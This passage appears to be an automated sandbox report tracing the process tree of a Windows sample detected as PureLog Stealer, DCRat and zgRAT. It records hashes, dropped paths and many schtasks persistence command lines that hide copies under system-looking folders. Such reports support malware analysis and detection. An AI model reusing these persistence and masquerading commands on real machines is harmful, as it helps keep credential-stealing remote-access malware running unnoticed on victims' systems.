                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8fb55f92eae142fb-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=2922&min_rtt=1596&rtt_var=3252&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1417&delivery_rate=119564&cwnd=211&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 34 0d 0a 30 56 58 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 40VX[0


                                                                                                                                Target ID:0
                                                                                                                                Start time:15:46:53
                                                                                                                                Start date:01/01/2025
                                                                                                                                Path:C:\Users\user\Desktop\544WP3NHaP.exe
                                                                                                                                Wow64 process (32bit):true
                                                                                                                                Commandline:"C:\Users\user\Desktop\544WP3NHaP.exe"
                                                                                                                                Imagebase:0x8a0000
                                                                                                                                File size:2'235'083 bytes
                                                                                                                                MD5 hash:50ABE040B81818BF7ECE156A10DBBBC9
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Yara matches:
                                                                                                                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000003.1651965789.00000000062AB000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000003.1652451917.0000000006BBB000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                Reputation:low
                                                                                                                                Has exited:true

                                                                                                                                Target ID:1
                                                                                                                                Start time:15:46:53
                                                                                                                                Start date:01/01/2025
                                                                                                                                Path:C:\Windows\SysWOW64\wscript.exe
                                                                                                                                Wow64 process (32bit):true
                                                                                                                                Commandline:"C:\Windows\System32\WScript.exe" "C:\bridgemssurrogateintonet\QHbd8WvF.vbe"
                                                                                                                                Imagebase:0xe40000
                                                                                                                                File size:147'456 bytes
                                                                                                                                MD5 hash:FF00E0480075B095948000BDC66E81F0
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Reputation:high
                                                                                                                                Has exited:true

                                                                                                                                Target ID:3
                                                                                                                                Start time:15:47:15
                                                                                                                                Start date:01/01/2025
                                                                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                Wow64 process (32bit):true
                                                                                                                                Commandline:C:\Windows\system32\cmd.exe /c ""C:\bridgemssurrogateintonet\7tLztOWB7CeM.bat" "
                                                                                                                                Imagebase:0x240000
                                                                                                                                File size:236'544 bytes
                                                                                                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Reputation:high
                                                                                                                                Has exited:true

                                                                                                                                Target ID:4
                                                                                                                                Start time:15:47:15
                                                                                                                                Start date:01/01/2025
                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                Imagebase:0x7ff7699e0000
                                                                                                                                File size:862'208 bytes
                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Reputation:high
                                                                                                                                Has exited:true

                                                                                                                                Target ID:5
                                                                                                                                Start time:15:47:15
                                                                                                                                Start date:01/01/2025
                                                                                                                                Path:C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:"C:\bridgemssurrogateintonet/bridgeportDhcpcommon.exe"
                                                                                                                                Imagebase:0xa10000
                                                                                                                                File size:1'913'344 bytes
                                                                                                                                MD5 hash:F9C0873D0CBC71DB9729CDF3B976A5AD
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Yara matches:
                                                                                                                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000005.00000000.1870378712.0000000000A12000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000005.00000002.1924266865.000000001306B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exe, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exe, Author: Joe Security
                                                                                                                                Antivirus matches:
                                                                                                                                • Detection: 100%, Avira
                                                                                                                                • Detection: 100%, Joe Sandbox ML
                                                                                                                                • Detection: 74%, ReversingLabs
                                                                                                                                Reputation:low
                                                                                                                                Has exited:true

                                                                                                                                Target ID:6
                                                                                                                                Start time:15:47:17
                                                                                                                                Start date:01/01/2025
                                                                                                                                Path:C:\Windows\System32\schtasks.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:schtasks.exe /create /tn "SearchAppS" /sc MINUTE /mo 8 /tr "'C:\Recovery\SearchApp.exe'" /f
                                                                                                                                Imagebase:0x7ff76f990000
                                                                                                                                File size:235'008 bytes
                                                                                                                                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Reputation:high
                                                                                                                                Has exited:true

                                                                                                                                Target ID:7
                                                                                                                                Start time:15:47:17
                                                                                                                                Start date:01/01/2025
                                                                                                                                Path:C:\Windows\System32\schtasks.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:schtasks.exe /create /tn "SearchApp" /sc ONLOGON /tr "'C:\Recovery\SearchApp.exe'" /rl HIGHEST /f
                                                                                                                                Imagebase:0x7ff76f990000
                                                                                                                                File size:235'008 bytes
                                                                                                                                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Reputation:high
                                                                                                                                Has exited:true

                                                                                                                                Target ID:8
                                                                                                                                Start time:15:47:17
                                                                                                                                Start date:01/01/2025
                                                                                                                                Path:C:\Windows\System32\schtasks.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:schtasks.exe /create /tn "SearchAppS" /sc MINUTE /mo 12 /tr "'C:\Recovery\SearchApp.exe'" /rl HIGHEST /f
                                                                                                                                Imagebase:0x7ff76f990000
                                                                                                                                File size:235'008 bytes
                                                                                                                                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Reputation:high
                                                                                                                                Has exited:true

                                                                                                                                Target ID:9
                                                                                                                                Start time:15:47:17
                                                                                                                                Start date:01/01/2025
                                                                                                                                Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\55jg4js0\55jg4js0.cmdline"
                                                                                                                                Imagebase:0x7ff6bd510000
                                                                                                                                File size:2'759'232 bytes
                                                                                                                                MD5 hash:F65B029562077B648A6A5F6A1AA76A66
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Reputation:moderate
                                                                                                                                Has exited:true

                                                                                                                                Target ID:10
                                                                                                                                Start time:15:47:17
                                                                                                                                Start date:01/01/2025
                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                Imagebase:0x7ff7699e0000
                                                                                                                                File size:862'208 bytes
                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Reputation:high
                                                                                                                                Has exited:true

                                                                                                                                Target ID:11
                                                                                                                                Start time:15:47:17
                                                                                                                                Start date:01/01/2025
                                                                                                                                Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES26F0.tmp" "c:\Windows\System32\CSCFCD79A4B9D0A479191609B82C626EB1.TMP"
                                                                                                                                Imagebase:0x7ff759480000
                                                                                                                                File size:52'744 bytes
                                                                                                                                MD5 hash:C877CBB966EA5939AA2A17B6A5160950
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Reputation:high
                                                                                                                                Has exited:true

                                                                                                                                Target ID:12
                                                                                                                                Start time:15:47:18
                                                                                                                                Start date:01/01/2025
                                                                                                                                Path:C:\Windows\System32\schtasks.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:schtasks.exe /create /tn "iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQi" /sc MINUTE /mo 5 /tr "'C:\Program Files (x86)\mozilla maintenance service\logs\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe'" /f
                                                                                                                                Imagebase:0x7ff76f990000
                                                                                                                                File size:235'008 bytes
                                                                                                                                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Has exited:true

                                                                                                                                Target ID:13
                                                                                                                                Start time:15:47:18
                                                                                                                                Start date:01/01/2025
                                                                                                                                Path:C:\Windows\System32\schtasks.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:schtasks.exe /create /tn "iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ" /sc ONLOGON /tr "'C:\Program Files (x86)\mozilla maintenance service\logs\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe'" /rl HIGHEST /f
                                                                                                                                Imagebase:0x7ff76f990000
                                                                                                                                File size:235'008 bytes
                                                                                                                                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Has exited:true

                                                                                                                                Target ID:14
                                                                                                                                Start time:15:47:18
                                                                                                                                Start date:01/01/2025
                                                                                                                                Path:C:\Windows\System32\schtasks.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:schtasks.exe /create /tn "iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQi" /sc MINUTE /mo 8 /tr "'C:\Program Files (x86)\mozilla maintenance service\logs\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe'" /rl HIGHEST /f
                                                                                                                                Imagebase:0x7ff76f990000
                                                                                                                                File size:235'008 bytes
                                                                                                                                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Has exited:true

                                                                                                                                Target ID:15
                                                                                                                                Start time:15:47:18
                                                                                                                                Start date:01/01/2025
                                                                                                                                Path:C:\Windows\System32\schtasks.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:schtasks.exe /create /tn "iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQi" /sc MINUTE /mo 11 /tr "'C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe'" /f
                                                                                                                                Imagebase:0x7ff76f990000
                                                                                                                                File size:235'008 bytes
                                                                                                                                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Has exited:true

                                                                                                                                Target ID:18
                                                                                                                                Start time:15:47:18
                                                                                                                                Start date:01/01/2025
                                                                                                                                Path:C:\Windows\System32\schtasks.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:schtasks.exe /create /tn "iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ" /sc ONLOGON /tr "'C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe'" /rl HIGHEST /f
                                                                                                                                Imagebase:0x7ff76f990000
                                                                                                                                File size:235'008 bytes
                                                                                                                                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Has exited:true

                                                                                                                                Target ID:19
                                                                                                                                Start time:15:47:19
                                                                                                                                Start date:01/01/2025
                                                                                                                                Path:C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:"C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe"
                                                                                                                                Imagebase:0x340000
                                                                                                                                File size:1'913'344 bytes
                                                                                                                                MD5 hash:F9C0873D0CBC71DB9729CDF3B976A5AD
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Antivirus matches:
                                                                                                                                • Detection: 74%, ReversingLabs
                                                                                                                                Has exited:true

                                                                                                                                Target ID:20
                                                                                                                                Start time:15:47:19
                                                                                                                                Start date:01/01/2025
                                                                                                                                Path:C:\Windows\System32\schtasks.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:schtasks.exe /create /tn "iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQi" /sc MINUTE /mo 11 /tr "'C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe'" /rl HIGHEST /f
                                                                                                                                Imagebase:0x7ff76f990000
                                                                                                                                File size:235'008 bytes
                                                                                                                                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Has exited:true

                                                                                                                                Target ID:21
                                                                                                                                Start time:15:47:19
                                                                                                                                Start date:01/01/2025
                                                                                                                                Path:C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:"C:\Program Files\Windows Portable Devices\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe"
                                                                                                                                Imagebase:0xa0000
                                                                                                                                File size:1'913'344 bytes
                                                                                                                                MD5 hash:F9C0873D0CBC71DB9729CDF3B976A5AD
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Yara matches:
                                                                                                                                • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000015.00000002.2906400363.0000000002C86000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000015.00000002.2906400363.0000000002606000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                Has exited:false

                                                                                                                                Target ID:22
                                                                                                                                Start time:15:47:19
                                                                                                                                Start date:01/01/2025
                                                                                                                                Path:C:\Windows\System32\schtasks.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:schtasks.exe /create /tn "iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQi" /sc MINUTE /mo 12 /tr "'C:\bridgemssurrogateintonet\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe'" /f
                                                                                                                                Imagebase:0x7ff76f990000
                                                                                                                                File size:235'008 bytes
                                                                                                                                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Has exited:true

                                                                                                                                Target ID:23
                                                                                                                                Start time:15:47:19
                                                                                                                                Start date:01/01/2025
                                                                                                                                Path:C:\Windows\System32\schtasks.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:schtasks.exe /create /tn "iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ" /sc ONLOGON /tr "'C:\bridgemssurrogateintonet\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe'" /rl HIGHEST /f
                                                                                                                                Imagebase:0x7ff76f990000
                                                                                                                                File size:235'008 bytes
                                                                                                                                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Has exited:true

                                                                                                                                Target ID:25
                                                                                                                                Start time:15:47:19
                                                                                                                                Start date:01/01/2025
                                                                                                                                Path:C:\Windows\System32\schtasks.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:schtasks.exe /create /tn "iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQi" /sc MINUTE /mo 13 /tr "'C:\bridgemssurrogateintonet\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe'" /rl HIGHEST /f
                                                                                                                                Imagebase:0x7ff76f990000
                                                                                                                                File size:235'008 bytes
                                                                                                                                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Has exited:true

                                                                                                                                Target ID:27
                                                                                                                                Start time:15:47:19
                                                                                                                                Start date:01/01/2025
                                                                                                                                Path:C:\Windows\System32\schtasks.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:schtasks.exe /create /tn "iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQi" /sc MINUTE /mo 12 /tr "'C:\Windows\apppatch\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe'" /f
                                                                                                                                Imagebase:0x7ff76f990000
                                                                                                                                File size:235'008 bytes
                                                                                                                                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Has exited:true

                                                                                                                                Target ID:28
                                                                                                                                Start time:15:47:19
                                                                                                                                Start date:01/01/2025
                                                                                                                                Path:C:\Windows\System32\schtasks.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:schtasks.exe /create /tn "iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ" /sc ONLOGON /tr "'C:\Windows\apppatch\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe'" /rl HIGHEST /f
                                                                                                                                Imagebase:0x7ff76f990000
                                                                                                                                File size:235'008 bytes
                                                                                                                                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Has exited:true

                                                                                                                                Target ID:29
                                                                                                                                Start time:15:47:19
                                                                                                                                Start date:01/01/2025
                                                                                                                                Path:C:\Windows\System32\schtasks.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:schtasks.exe /create /tn "iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQi" /sc MINUTE /mo 8 /tr "'C:\Windows\apppatch\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe'" /rl HIGHEST /f
                                                                                                                                Imagebase:0x7ff76f990000
                                                                                                                                File size:235'008 bytes
                                                                                                                                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Has exited:true

                                                                                                                                Target ID:30
                                                                                                                                Start time:15:47:19
                                                                                                                                Start date:01/01/2025
                                                                                                                                Path:C:\Windows\System32\schtasks.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:schtasks.exe /create /tn "bridgeportDhcpcommonb" /sc MINUTE /mo 8 /tr "'C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exe'" /f
                                                                                                                                Imagebase:0x7ff76f990000
                                                                                                                                File size:235'008 bytes
                                                                                                                                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Has exited:true

                                                                                                                                Target ID:31
                                                                                                                                Start time:15:47:19
                                                                                                                                Start date:01/01/2025
                                                                                                                                Path:C:\Windows\System32\schtasks.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:schtasks.exe /create /tn "bridgeportDhcpcommon" /sc ONLOGON /tr "'C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exe'" /rl HIGHEST /f
                                                                                                                                Imagebase:0x7ff76f990000
                                                                                                                                File size:235'008 bytes
                                                                                                                                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Has exited:true

                                                                                                                                Target ID:32
                                                                                                                                Start time:15:47:19
                                                                                                                                Start date:01/01/2025
                                                                                                                                Path:C:\Windows\System32\schtasks.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:schtasks.exe /create /tn "bridgeportDhcpcommonb" /sc MINUTE /mo 12 /tr "'C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exe'" /rl HIGHEST /f
                                                                                                                                Imagebase:0x7ff76f990000
                                                                                                                                File size:235'008 bytes
                                                                                                                                MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Has exited:true

                                                                                                                                Target ID:33
                                                                                                                                Start time:15:47:19
                                                                                                                                Start date:01/01/2025
                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\xNnAMDzXoE.bat"
                                                                                                                                Imagebase:0x7ff651440000
                                                                                                                                File size:289'792 bytes
                                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Has exited:true

                                                                                                                                Target ID:34
                                                                                                                                Start time:15:47:19
                                                                                                                                Start date:01/01/2025
                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                Imagebase:0x7ff7699e0000
                                                                                                                                File size:862'208 bytes
                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Has exited:true

                                                                                                                                Target ID:35
                                                                                                                                Start time:15:47:20
                                                                                                                                Start date:01/01/2025
                                                                                                                                Path:C:\Windows\System32\chcp.com
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:chcp 65001
                                                                                                                                Imagebase:0x7ff667160000
                                                                                                                                File size:14'848 bytes
                                                                                                                                MD5 hash:33395C4732A49065EA72590B14B64F32
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Has exited:true

                                                                                                                                Target ID:36
                                                                                                                                Start time:15:47:20
                                                                                                                                Start date:01/01/2025
                                                                                                                                Path:C:\Windows\System32\w32tm.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                                                                                                                Imagebase:0x7ff7d83c0000
                                                                                                                                File size:108'032 bytes
                                                                                                                                MD5 hash:81A82132737224D324A3E8DA993E2FB5
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Has exited:true

                                                                                                                                Target ID:37
                                                                                                                                Start time:15:47:21
                                                                                                                                Start date:01/01/2025
                                                                                                                                Path:C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exe
                                                                                                                                Imagebase:0x250000
                                                                                                                                File size:1'913'344 bytes
                                                                                                                                MD5 hash:F9C0873D0CBC71DB9729CDF3B976A5AD
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Has exited:true

                                                                                                                                Target ID:38
                                                                                                                                Start time:15:47:21
                                                                                                                                Start date:01/01/2025
                                                                                                                                Path:C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exe
                                                                                                                                Imagebase:0xeb0000
                                                                                                                                File size:1'913'344 bytes
                                                                                                                                MD5 hash:F9C0873D0CBC71DB9729CDF3B976A5AD
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Has exited:true

                                                                                                                                Target ID:39
                                                                                                                                Start time:15:47:25
                                                                                                                                Start date:01/01/2025
                                                                                                                                Path:C:\Windows\apppatch\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:"C:\Windows\apppatch\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe"
                                                                                                                                Imagebase:0x6e0000
                                                                                                                                File size:1'913'344 bytes
                                                                                                                                MD5 hash:F9C0873D0CBC71DB9729CDF3B976A5AD
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Antivirus matches:
                                                                                                                                • Detection: 74%, ReversingLabs
                                                                                                                                Has exited:true

                                                                                                                                Target ID:42
                                                                                                                                Start time:15:47:35
                                                                                                                                Start date:01/01/2025
                                                                                                                                Path:C:\Windows\apppatch\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:"C:\Windows\apppatch\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe"
                                                                                                                                Imagebase:0xc70000
                                                                                                                                File size:1'913'344 bytes
                                                                                                                                MD5 hash:F9C0873D0CBC71DB9729CDF3B976A5AD
                                                                                                                                Has elevated privileges:false
                                                                                                                                Has administrator privileges:false
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Has exited:true

                                                                                                                                Target ID:43
                                                                                                                                Start time:15:47:43
                                                                                                                                Start date:01/01/2025
                                                                                                                                Path:C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:"C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exe"
                                                                                                                                Imagebase:0x90000
                                                                                                                                File size:1'913'344 bytes
                                                                                                                                MD5 hash:F9C0873D0CBC71DB9729CDF3B976A5AD
                                                                                                                                Has elevated privileges:false
                                                                                                                                Has administrator privileges:false
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Has exited:true

                                                                                                                                Target ID:45
                                                                                                                                Start time:15:48:00
                                                                                                                                Start date:01/01/2025
                                                                                                                                Path:C:\Windows\apppatch\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:"C:\Windows\apppatch\iwpFyCLxsYWXWxaOAxPIfjTlvkGJkQ.exe"
                                                                                                                                Imagebase:0xea0000
                                                                                                                                File size:1'913'344 bytes
                                                                                                                                MD5 hash:F9C0873D0CBC71DB9729CDF3B976A5AD
                                                                                                                                Has elevated privileges:false
                                                                                                                                Has administrator privileges:false
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Has exited:true

                                                                                                                                  Execution Graph

                                                                                                                                  Execution Coverage:9.5%
                                                                                                                                  Dynamic/Decrypted Code Coverage:0%
